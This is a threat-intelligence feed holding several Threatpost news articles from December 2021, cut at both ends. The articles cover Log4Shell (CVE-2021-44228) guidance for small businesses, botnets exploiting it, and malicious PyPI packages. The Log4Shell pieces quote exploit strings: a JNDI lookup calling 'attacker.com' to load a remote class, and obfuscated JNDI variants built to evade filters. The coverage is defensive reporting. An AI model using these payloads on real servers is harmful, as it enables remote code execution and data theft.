However, this unfortunately puts SMBs at even worse risk, because they need to rely on their third-party vendors to patch and respond in many cases.\n\nThe bug was first disclosed as a zero-day vulnerability last week, but an emergency fix has been rolled out that now must be incorporated by the many developers who use log4j in their applications. The steps to address Log4Shell for SMBs thus include identifying potentially affected applications (including those provided by MSPs), confirming the vulnerability\u2019s impact within them, and applying or confirming updates as soon as possible. SMBs will also need to determine whether they\u2019re already compromised and remediate the issue if so.\n\nAll of this should take priority since [a slew of attacks is imminent](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), thanks to an exploit becoming publicly available online, researchers noted.\n\n\u201cNumerous attack groups are already [actively exploiting](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) this vulnerability, mostly through automated scripts,\u201d Maor warned. \u201cThis means we expect to see this being exploited in masses, hitting tens of thousands or even more targets.\u201d\n\n## What Bad Log4Shell Outcomes Are Possible for SMBs?\n\n**Ofer Maor, Mitiga CTO:** One of the concerns is that a lot of these attacks now will focus on getting initial access only and establishing persistence (that is, installing something that will allow the attacker to have access to their systems later, even after the vulnerability has been fixed).\n\n**Marc-\u00c9tienne L\u00e9veill\u00e9, malware researcher for ESET:** SMBs providing online services may expose their system to malware and data exfiltration if their systems use the log4j software to log events. The risk is quite high, given the exploit is available online and relatively easy to trigger. 
Once into the network, cybercriminals could pivot to gain access to additional resources.\n\n**Josh Bressers, vice president of security at Anchore:** This vulnerability allows attackers to run the code of their choosing, such as a cryptominer, a backdoor or data-stealing malware, for example. One of the challenges for a vulnerability like this is the attacker landscape is changing rapidly. So far, most of the attacks seem to be using compute resources to mine cryptocurrency, but these attacks are changing and evolving each hour. It is expected that the attacks will gain in sophistication over the coming days and weeks.\n\n**Mark Nunnikhoven, distinguished cloud strategist at Lacework:** Unfortunately\u2026an attacker can take over your system or steal your data quite easily using this vulnerability.\n\n**Pieter Ockers, senior director of technical services at HackerOne: **In a more devastating case, criminals that gain initial access to the victim\u2019s environment could auction that access off to crews that specialize in executing ransomware attacks. SMBs should be hyper-aware of any of their software vendors/MSPs that use Apache log4j in case they are affected by a breach; I suspect we might hear of some ransomware attacks soon stemming from this vulnerability.\n\n## How Is a Real-World Log4Shell Attack Carried Out?\n\n**Cybereason CTO Yonatan Striem-Amit**: The most prevalent attack scenarios we\u2019ve seen are abusing things like the user agent or things like a log-in screen. If an application has a log-in page where a user is asked to put his username and password (and a lot of them do), an attacker could just supply the malicious string within that user field and get code execution on that server. 
After that he essentially controls logins, and therefore can start doing whatever he wants on that server, including, of course, eavesdropping into every other user who\u2019s logging in to the environment with their password.\n\n**Adam Goodman, vice president of product management at Invicti Security: **This attack is astonishingly easy to execute. This is because it may not require authentication to execute, nor would it require penetrating multiple application and/or networking layers to begin the exploit. It\u2019s simply a text string sent to any places that will be logged. And finding such a place is very easy \u2013 it can be a simple header, or a simple text field or error condition sent to a log file.\n\nTo exploit Log4Shell, the attacker may use any user input subsequently logged by the log4j framework. For example, in the case of a web application, it may be any text entry field or HTTP header such as User-Agent. Server logging is often set to log headers as well as form data.\n\nThe attacker only needs to include the following string in the logged user input:\n\n${jndi:ldap://attacker.com/executeme}\n\nWhere attacker.com is a server controlled by the attacker and executeme is the Java class to be executed on the victim server. And this is just one of many ways to exploit this vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cA real world-attack can be as simple as the attack sending a specifically crafted web request to a vulnerable server. When the server processes that request, the attacker then has access to the server. The Lacework Labs team has documented this attack and some other technical aspects of attacks we\u2019ve seen in[ this blog post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>).\u201d\n\n**Anchore\u2019s Bressers: **Attackers send requests to vulnerable applications, this triggers the vulnerability. 
The application then downloads a cryptocurrency mining application, in one scenario, and runs it on the compromised system. The cryptomining application then consumes large amounts of victim\u2019s processing power while the attacker claims the cryptomining rewards.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/14151922/log4j-e1639513188979.png>)\n\nTrend Micro published this attack-scenario flow on Tuesday (https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review).\n\n## How Can SMBs Address Log4Shell without a Dedicated Security Team?\n\n**HackerOne\u2019s Ockers: **These kinds of wide sweeping cyberattacks will always be a bigger challenge for those that lack a dedicated security team. If only one or two individuals in IT are working to monitor security, it\u2019s even more important you\u2019re prepared and have already taken stock of the software you\u2019re using and your vendor\u2019s software. Once you gain that visibility, I recommend patching any instances you find of log4j and updating the software to version 2.15.0 in your own software. I\u2019d also confirm any vendors\u2019 exposure and incident management around log4j patching and response.\n\n_According to __[Microsoft\u2019s recent blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>)__, the log4j 2 library is included in widely deployed Apache products including Struts 2, Solr, Druid, Flink and Swift. 
SMBs that have built applications with these products should conduct a code audit to determine if the vulnerable version of log4j is in use._\n\n**Mitiga\u2019s Maor:** SMBs should set up an immediate task force to map all affected homegrown systems and patch them, while allowing IT to map all external systems and communicate with the censored systems.\n\n**Anchore\u2019s Bressers: **This vulnerability is going to be especially challenging for small and medium business users without a dedicated security team. Ideally software vendors are being proactive in their investigations and updates and are contacting affected customers, but this is not always the case.\n\nDepending on the level of technical acumen an organization has, there are steps that can be taken to detect and resolve the issue themselves. There are various open-source tools that exist to help detect this vulnerability on systems such as [Syft and Grype](<https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html>). CISA has [released guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) regarding this vulnerability, including steps a business can take.\n\n**Lacework\u2019s Nunnikhoven: **\u201cWhile IT knowledge is required, the basic steps don\u2019t require a security team. IT teams should be trying to find systems that use log4j in their environment and then apply one of the techniques the fantastic team of volunteers with the log4j project have published or the recommended guidance from that system\u2019s vendors. 
This is a lot of work but it\u2019s necessary to reduce the risk to your business.\n\n_The log4j team\u2019s resource is __[available here](<https://logging.apache.org/log4j/2.x/security.html>), in the mitigation section under the \u201cFixed in Log4j 2.15.0\u201d heading._ _Many organizations have also published free tools to help identify vulnerable applications, [like this one](<https://about.sourcegraph.com/blog/log4j-log4shell-0-day/>), [this one](<https://log4j-tester.trendmicro.com/>) or [this one](<https://github.com/hillu/local-log4j-vuln-scanner>)._\n\n**Invicti\u2019s Adam Goodman: **It\u2019s a nightmare of a problem if you have a surplus of Java applications deployed everywhere, not just on the primary website. Organizations should immediately determine where and how they directly or indirectly use this library and then take steps to mitigate the vulnerability by either upgrading the library or modifying Java system properties to disable the vulnerable functionality.\n\nAim to ensure that all applications have limited outbound internet connectivity, and use Ansible scripts or adequate security tools to scan _en masse_ for the vulnerability before forcibly patching it. It\u2019s crucial to use security tools that target all of the applications they can find so that organizations have a more accurate window into their security posture.\n\nOrganizations that lack sufficient budget to invest in discovery tools should make a list of Java applications which they add to continually, and check them off, while prioritizing apps that present the most risk if exploited.\n\n## What Happens if an SMB Uses an MSP?\n\n**Anchore\u2019s Bressers: **I would expect an MSP to take the lead on this issue for their customers. An MSP should be monitoring their infrastructure for indicators of compromise, applying workarounds when possible, and updating the managed applications as vendor updates become available. 
Any business using MSP services should reach out to their provider and request a status update on the Log4Shell.\n\n**Ryan Weeks, CISO at Datto:** \u201cCyber-threats are always prevalent. Especially for small to medium-sized businesses (SMBs) \u2013 [78 percent](<https://www.datto.com/resources/dattos-2020-global-state-of-the-channel-ransomware-report>) of MSPs reported attacks against their client SMBs in the last two years alone. MSPs have a responsibility to diligently check for vulnerabilities and arm their customers with the tools to combat them. It\u2019s not enough to simply install routine software updates. SMBs need to ensure their partners proactively push out security updates for any affected products, and continually monitor for potential exploits.\n\n**Invicti\u2019s Adam Goodman: **This is an issue front-and-center in the security community and if an organization is using an MSP, it\u2019s highly likely that MSP is actively working on this. Confirm that a ticket and incident is open for this vulnerability, and ask the MSP for a list of managed applications that are under remediation. It\u2019s vital to review that list of apps for anything that\u2019s missing, including any back-office or forgotten tools in the mix. Ensure the MSP has visibility into the attack surface so that you both can better handle necessary containment steps moving forward.\n\n**Lacework\u2019s Nunnikhoven: **A managed service provider can help update and fix the systems they manage. A managed security service provider can help detect and stop attacks aimed at this issue, and help investigate any attacks that may have already taken place. The first step in both cases is speaking with your MSP/MSSP to understand the steps they are taking to help protect their customers.\n\n## What Applications Should SMBs Worry About?\n\n**Mitiga\u2019s Maor:** Impact can vary significantly as many custom-developed and off-the-shelf products are impacted. 
Many adversaries are using the vulnerability as part of mass-scanning efforts to identify vulnerable systems. Likewise, some known malware strains have already incorporated exploitation of this vulnerability into their spreading mechanisms. Any Java application might be affected.\n\n**Invicti\u2019s Adam Goodman: **SMBs should address worries and concerns based on business risk. Internet-facing apps should receive immediate priority, followed by applications that are critical to the software supply chain or back-office and financial applications. There is also an excellent effort from the security community to compile all affected technologies, [it can be found here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>).\u201d\n\n**ESET\u2019s L\u00e9veill\u00e9: **As a first step, SMBs should ask questions of the organization providing their internet-facing services such as their website. Then they should see if any of their applications use log4j to generate logs. Java applications and webservices would be the first to look at because log4j is a Java library.\n\n**Cybereason\u2019s Striem-Amit:** The world of Java and open source has so many dependencies, where a company might use one product, but it actually carries with it a dozen other libraries. So log4j could be present even though a company might not necessarily even be aware or \u2026 done it directly. So the scanning and the analysis is severely complex. And you have to go in each one of your servers and see, are we using log4j either directly or indirectly in that environment.\n\n## How Can SMBs Remediate a Successful Log4Shell Attack?\n\n**Mitiga\u2019s Maor:** Thankfully, there\u2019s a lot that can be done to harden environments. For customers with internally developed applications, limiting outbound internet connections from servers to only whitelisted hosts is a great step, if challenging to implement. 
Likewise, a variety of cybersecurity companies have listed steps that can be taken to harden vulnerable versions of log4j if upgrades can\u2019t be performed readily. Similarly, exploitation of this vulnerability and many others can be caught using typical compromise assessment techniques. It pays to threat hunt! Remediation is no different than recovering from any other type of RCE vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cRemediation of this issue will depend on where you find log4j. If it\u2019s in something you\u2019ve written, you can update the library or turn off the vulnerable feature. For commercial software and services, you\u2019re reliant on the vendor to resolve the issue. While that work is ongoing, monitoring your network to attack attempts is reasonably straightforward\u2026if you have the security controls in place.\n\nLacework Labs has published[ a detailed technical post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) on some of the attack techniques currently in use. Expect more variants as cybercriminals develop more techniques to avoid various security controls and other mitigation.\n\nIn situations like this it\u2019s important to understand that until the root cause has been resolved (log4j updated or the feature in question turned off), attackers will continue to work to evade any mitigations that defenders put in place to stop them.\n\n**Anchore\u2019s Bressers: **An organization without an incident-management team on staff should reach out to an incident-management consulting group. There are a number of important steps that should happen when investigating any cybersecurity attack, successful or not, that can require preserving evidence, recovering data, and protecting employees and users. This is a serious vulnerability with serious consequences. 
It\u2019s one of the worst we have seen in recent history because of its ease of exploitability, far-reaching impacts and powerful nature.\n\n## Final Thoughts\n\n**Datto\u2019s Weeks:** Scenarios such as the log4j vulnerability underscore the importance of proactivity in security. While many are now scrambling to address the vulnerability with patches, it\u2019s equally more important to plan for subsequent attacks. Fortunately, there are solutions that can apply known workarounds for vulnerable instances.\n\n**HackerOne\u2019s Ockers: **As a best practice, I recommend all businesses have a clear understanding of the software used within their own systems. Even more important for SMBs in this instance \u2014 businesses should also have a clear understanding of the licensing agreements and security policies of any software vendors or service providers. This level of visibility lets security and IT teams quickly understand where they\u2019re at risk if, and when, something like this is exploited.\n\n**ESET\u2019s L\u00e9veill\u00e9: **SMBs should verify if there were any successful attempts to exploit the vulnerability by looking at their logs.\n\n**HackerOne\u2019s Ockers: **SMBs and larger organizations alike will be affected. As we\u2019re seeing, exploitation will continue to be widespread \u2013 this means it\u2019s particularly important that SMBs check if vendors are still using the vulnerable version of log4j to process user-controlled or otherwise untrusted data. And, if so, SMBs should also ask vendors if their data is stored or processed in the same exposed environment.\n\n**Cybereason\u2019s Striem-Amit:** I think at the end of the day, really prioritize the most internet-facing environments, and rely on your service providers as much as they can to assist you with other patching. You\u2019re welcome to use [our vaccine](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) to buy time. 
It does work remarkably well to make sure that, between now and when you actually end up patching the server, you\u2019re kind of secure.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, features security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T17:54:47", "type": "threatpost", "title": "What the Log4Shell Bug Means for SMBs: Experts Weigh In", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T17:54:47", "id": "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "href": "https://threatpost.com/log4shell-bug-smbs-experts/177021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:15", "description": "Cybersecurity professionals across the world have been scrambling to shore up their systems against a critical [remote code-execution (RCE) flaw ](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) (CVE-2021-44228) in the Apache Log4j tool, discovered just days ago.\n\nNow under active exploit, the \u201cLog4Shell\u201d bug allows complete server takeover. Researchers have started to fill in the details on the latest Log4Shell attacks, and they reported finding at least 10 specific Linux botnets leading the charge.\n\nFirst, analysts at NetLab 360 detected two waves of [Log4Shell attacks](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) on their honeypots, from the Muhstik and Mirai botnets.\n\n## **Mirai Tweaked to Troll for Log4Shell Vulnerability **\n\nThe analysts at Netlab 360 said this is a new variant of Mirai with a few specific innovations. 
First, they pointed out the code piece \u201ctable_init/table_lock_val/table_unlock_val and other Mirai-specific configuration management functions have been removed.\u201d\n\nSecondly, they added, \u201cThe attack_init function is also discarded, and the DDoS attack function is called directly by the command-processing function.\u201d\n\nFinally, they found this iteration of the Mirai botnet uses a two-level domain for its command-and-control (C2) mechanism, which the team at Netlab 360 said was \u201crare.\u201d\n\n## **Muhstik Variant Attacks Log4Shell**\n\nThe other Linux botnet launched to take advantage of the Apache Log4j library flaw is [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>), a Mirai variant.\n\n\u201cIn this captured sample, we note that the new Muhstik variant adds a backdoor module, ldm, which has the ability to add an SSH backdoor public key with the following installed backdoor public key,\u201d Netlab 360 reported.\n\nOnce added, the public key lets a threat actor log onto the server without so much as a password, they explained.\n\n\u201cMuhstik takes a blunt approach to spread the payload aimlessly, knowing that there will be vulnerable machines, and in order to know who has been infected, Muhstik adopts TOR network for its reporting mechanism,\u201d the Netlab 360 team said.\n\nFollowing detection of those attacks, the Netlab 360 team [found](<https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/>) other botnets on the hunt for the Log4Shell vulnerability, including: DDoS family Elknot; mining family m8220; SitesLoader; xmrig.pe; xmring.ELF; attack tool 1; attack tool 2; plus one unknown and a PE family.\n\n## **Geography of Log4Shell Attacks**\n\nThe majority of [exploitation attempts against Log4Shell](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>) originate in Russia, according to Kaspersky researchers who 
found 4,275 attacks launched from Russia, by far the most of any other region. By comparison, 351 attempts were launched from China and 1,746 from the U.S.\n\nSo far, the [Apache Log4j logging library exploit](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) has spun off 60 mutations \u2014 and it only took less than a day.\n\nThis story is developing, so stay tuned to Threatpost for [additional coverage](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T19:00:01", "type": "threatpost", "title": "Where the Latest Log4Shell Attacks Are Coming From", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T19:00:01", "id": "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "href": "https://threatpost.com/log4shell-attacks-origin-botnet/176977/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:26", "description": "Three malicious packages hosted in the Python Package Index (PyPI) code repository have been uncovered, which collectively have more than 12,000 downloads \u2013 and presumably slithered into installations in various applications.\n\nIndependent researcher Andrew Scott found the packages during a nearly sitewide analysis of the 
code contained in PyPI, which is a repository of software code created in the Python programming language. Like GitHub, npm and RubyGems, PyPI allows coders to upload software packages for use by developers in building various applications, services and other projects.\n\nUnfortunately, a single malicious package can be baked into multiple different projects \u2013 infecting them with cryptominers, info-stealers and more, and making remediation a complex process.\n\nIn this case, Scott found a malicious package containing a known trojan malware and two info-stealers.\n\nThe trojanized package is called \u201caws-login0tool,\u201d and once the package is installed, it fetches a payload executable that turns out to be a [known trojan](<https://www.virustotal.com/gui/file/79d9ecfcc143ae3216904c882a3984a90901536e6fccd223eb9bf78d943df1cd>), he said.\n\n\u201cI found this package because it was flagged in multiple text searches I did looking at setup.py, since that\u2019s one of the most common locations for malicious code in Python packages since arbitrary code can be executed there at install time,\u201d Scott explained in a [Sunday posting](<https://medium.com/ochrona/3-new-malicious-packages-found-on-pypi-a6bbb14b5e2>). \u201cSpecifically I found this by looking for import urllib.request since this is commonly used to exfiltrate data or download malicious files and it was also triggered by `from subprocess import Popen` which is somewhat suspicious because most packages don\u2019t need to execute arbitrary command line code.\u201d\n\nScott also identified two other malicious packages by looking at the import urllib.request string, both of which are built for data exfiltration.\n\nNamed \u201cdpp-client\u201d and \u201cdpp-client1234I,\u201d the two were uploaded by the same user in February. 
During installation, they collect details on the environment and file listings, and appear to \u201cbe looking specifically for files related to Apache Mesos,\u201d Scott said, which is an open-source project to manage computer clusters. Once the information is gathered, it\u2019s sent off to an unknown web service, according to the researcher.\n\nThe Python security team removed the identified packages once notified on Dec. 10, but all three packages live on thanks to the projects that imported them prior to the removal.\n\nScott said that the trojan package was first added to PyPI on Dec. 1. It was subsequently downloaded nearly 600 times. As for the data stealers, the dpp-client package has been downloaded more than 10,000 times, including 600+ downloads in the last month; dpp-client1234 has been downloaded around 1,500 times, and both packages mimicked an existing popular library with their source code URL, \u201cso anyone browsing to the package in PyPI or analyzing how popular the library was would see a large number of GitHub stars and forks \u2013 indicating a good reputation.\u201d\n\nThe software-supply chain has become an increasingly popular method of distributing malware. Last week, for instance, a series of malicious packages in the Node.js package manager (npm) code repository that looked to harvest Discord tokens [was found.](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>) The packages can be used to take over unsuspecting users\u2019 accounts and servers.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T18:46:34", "type": "threatpost", "title": "Malicious PyPI Code Packages Rack Up Thousands of Downloads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T18:46:34", "id": "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "href": "https://threatpost.com/malicious-pypi-code-packages/176971/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:35", "description": "The internet has a fast-spreading, malignant cancer \u2013 otherwise known as the Apache Log4j logging library exploit \u2013 that\u2019s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.\n\nMost of the attacks focus on cryptocurrency mining done on victims\u2019 dimes, as seen by [Sophos](<https://twitter.com/SophosLabs/status/1470213371521810432>), [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/?ranMID=24542&ranEAID=TnL5HPStwNw&ranSiteID=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&epi=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&irgwc=1&OCID=AID2200057_aff_7593_1243925&tduid=%28ir__cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600%29%287593%29%281243925%29%28TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA%29%28%29&irclickid=_cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600>) and other security firms. 
However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.\n\nAccording to [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) researchers, beyond coin-miners, they\u2019ve also seen installations of [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), which attackers can use to steal passwords, creep further into compromised networks with lateral movement and exfiltrate data.\n\nAlso, it could get a lot worse. Cybersecurity researchers at [Check Point warned](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) on Monday that the evolution has already led to more than 60 bigger, brawnier mutations, all spawned in less than a day.\n\n\u201cSince Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly: over 60 in less than 24 hours,\u201d they said.\n\nThe flaw, which is uber-easy to exploit, has been named [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>). It\u2019s resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated remote code execution (RCE) and complete server takeover. 
It first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft, last Thursday, and was being exploited in the wild within hours of public disclosure.\n\n## Mutations May Enable Exploits to Slip Past Protections\n\nOn Monday, Check Point reported that Log4Shell\u2019s new, malignant offspring can now be exploited \u201ceither over HTTP or HTTPS (the encrypted version of browsing),\u201d they said.\n\nThe more ways to exploit the vulnerability, the more alternatives attackers have to slip past the new protections that have frantically been pumped out since Friday, Check Point said. \u201cIt means that one layer of protection is not enough, and only multilayered security postures would provide a resilient protection,\u201d they wrote.\n\nBecause of the enormous attack surface it poses, some security experts are calling Log4Shell the biggest cybersecurity calamity of the year, putting it on par with the 2014 [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) family of security bugs that was exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning within hours of its initial disclosure.\n\n## Tactical Shifts\n\nBesides variations that can slip past protections, researchers are also seeing new tactics.\n\nLuke Richards, Threat Intelligence Lead at AI cybersecurity firm Vectra, told Threatpost on Monday that initial exploit attempts were basic call backs, with the initial exploit attempt coming from TOR nodes. They mostly pointed back to \u201cbingsearchlib[.]com,\u201d with the exploit being passed into the User Agent or the Uniform Resource Identifier (URI) of the request.\n\nBut since the initial wave of exploit attempts, Vectra has tracked many changes in tactics by the threat actors who are leveraging the vulnerability. 
Notably, there\u2019s been a shift in the commands being used, as the threat actors have begun obfuscating their requests.\n\n\u201cThis originally included stuffing the User Agent or URI with a base64 string, which when decoded by the vulnerable system caused the host to download a malicious dropper from attacker infrastructure,\u201d Richards explained in an email. Following this, the attackers started obfuscating the Java Naming and Directory Interface (JNDI) string itself, by taking advantage of other translation features of the JNDI lookup process.\n\nHe offered these examples:\n\n${jndi:${lower:l}${lower:d}a${lower:p}://world80 \n${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}// \n${jndi:dns://\n\n\u2026All of which achieve the same objective: \u201cto download a malicious class file and drop it onto the target system, or to leak credentials of cloud-based systems,\u201d Richards said.\n\n## Bug Has Been Targeted All Month\n\nAttackers have been buzzing around the Log4Shell vulnerability since at least Dec. 
1, it turns out, and as soon as CVE-2021-44228 was publicly disclosed late last week, attackers began to swarm around honeypots.\n\nOn Sunday, Sophos researchers [said](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1470213367142965254%7Ctwgr%5E%7Ctwcon%5Es1_c10&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost-new.php>) that they\u2019d \u201calready detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability,\u201d noting that log searches by other organizations (including Cloudflare) suggest that the vulnerability may have been openly exploited for weeks.\n\n> Sophos has already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability, and log searches by other organizations (including Cloudflare) suggest the vulnerability may have been openly exploited for weeks. 11/16 [pic.twitter.com/dbAXG5WdZ8](<https://t.co/dbAXG5WdZ8>)\n> \n> \u2014 SophosLabs (@SophosLabs) [December 13, 2021](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw>)\n\n\u201cEarliest evidence we\u2019ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,\u201d Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) on Saturday. \u201cThat suggests it was in the wild at least nine days before publicly disclosed. However, don\u2019t see evidence of mass exploitation until after public disclosure.\u201d\n\nOn Sunday, Cisco Talos [chimed in](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>) with a similar timeframe: It first saw attacker activity related to CVE-2021-44228 starting on Dec. 2. 
\u201cIt is recommended that organizations expand their hunt for scanning and exploit activity to this date,\u201d it advised.\n\n## Exploits Attempted on 40% of Corporate Networks\n\nCheck Point said on Monday that it\u2019s thwarted more than 845,000 exploit attempts, with more than 46 percent of those attempts made by known, malicious groups. In fact, Check Point warned that it\u2019s seen more than 100 attempts to exploit the vulnerability per minute.\n\nAs of 9 a.m. ET on Monday, its researchers had seen exploits attempted on more than 40 percent of corporate networks globally.\n\nThe map below illustrates the top targeted geographies.\n\n[Map: top targeted geographies](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/13121325/map.jpg>)\n\nTop affected geographies. Source: Check Point.\n\nHyperbole isn\u2019t an issue with this flaw. Security experts are rating it as one of the worst vulnerabilities of 2021, if not the tip-top most terrible. Dor Dali, Director of Information Security at Vulcan Cyber, classes it in the top-three worst flaws of the year: \u201cIt wouldn\u2019t be a stretch to say that every enterprise organization uses Java, and Log4j is one of the most-popular logging frameworks for Java,\u201d Dali noted via email on Monday. \u201cConnecting the dots, the impact of this vulnerability has the reach and potential to be substantial if mitigation efforts aren\u2019t taken right away.\u201d\n\nAs has been repeatedly stressed since its initial public disclosure, the Log4j vulnerability \u201cis 